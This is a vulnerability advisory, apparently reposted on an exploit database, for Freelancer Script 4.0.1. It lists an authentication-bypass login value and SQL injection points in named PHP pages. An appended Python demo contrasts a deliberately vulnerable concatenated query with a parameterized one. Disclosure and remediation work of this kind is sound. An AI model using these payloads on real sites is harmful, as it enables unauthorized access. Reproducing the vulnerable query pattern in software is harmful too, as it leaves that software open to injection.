###########################

# Freelancer Script 4.0.1 SQL Injection Vulnerability

###########################

################################################
#Title: FREELANCER SCRIPT v4.0.1 - Authentication Bypass & SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.2daybiz.com
#Vendor URL: http://2daybiz.com/content/products/products/job-site-script/119-freelancer-script.php
#Product: FREELANCER SCRIPT v4.0.1
#Google Dork: N/A
################################################
#
#  Product & Service Introduction:
#
#  Freelance script is easy to manage and very simple to deploy. It comes
#  with a web-based administrative panel that has the capabilities to
#  manage users, financial transactions, categories and all relevant
#  aspects of the system, with a few clicks of the mouse.
#
# --Authentication Bypass--
#
# http://localhost/freelancerscript/loginfr.php
#
# Username: 'or''='
# Password: 'or''='
#
#
# --SQL Injection--
#
# http://localhost/freelancerscript/project_details.php?pid=24[SQL]&title=project1
#
#   PoC:
#     http://prnt.sc/ekbqnm
#
# POST:
# http://localhost/freelancerscript/logincheck.php
# data: uname=demo[SQL]&pwd=demo&place=log&enter=Login
#
# PoC:
#  http://prnt.sc/ekbrel
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127
################################################

-- 
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |
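
Added example (not part of the original advisory and not the vendor's code): why the 'or''=' value in both login fields passes authentication when request input is concatenated into the query, shown next to the parameterized form that rejects it. The users table, its column names and the query shape are assumptions, since the page does not show the application's source; an in-memory SQLite database stands in for the application's database.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT)")
    db.execute("INSERT INTO users (uname, pwd) VALUES ('demo', 'demo')")
    return db

def concat_sql(uname, pwd):
    # Assumed vulnerable pattern: request values pasted into the SQL text.
    return ("SELECT id FROM users WHERE uname = '" + uname +
            "' AND pwd = '" + pwd + "'")

def login_concat(db, uname, pwd):
    try:
        return db.execute(concat_sql(uname, pwd)).fetchone() is not None
    except sqlite3.Error:
        # A lone quote (e.g. the name O'Brien) breaks the statement outright.
        return False

def login_param(db, uname, pwd):
    # Hardened pattern: values are bound as data and never parsed as SQL.
    # (Production code should also compare a password hash, not plaintext.)
    sql = "SELECT id FROM users WHERE uname = ? AND pwd = ?"
    return db.execute(sql, (uname, pwd)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    value = "'or''='"  # the login value given in the advisory
    # The built statement ends in OR '' = '', which is true for every row.
    print(concat_sql(value, value))
    for name, fn in (("concatenated", login_concat), ("parameterized", login_param)):
        print(name, "| valid login:", fn(db, "demo", "demo"),
              "| advisory value:", fn(db, value, value))
```

The same bound-parameter pattern is available in PHP through PDO or mysqli prepared statements.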

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-03-18]

###########################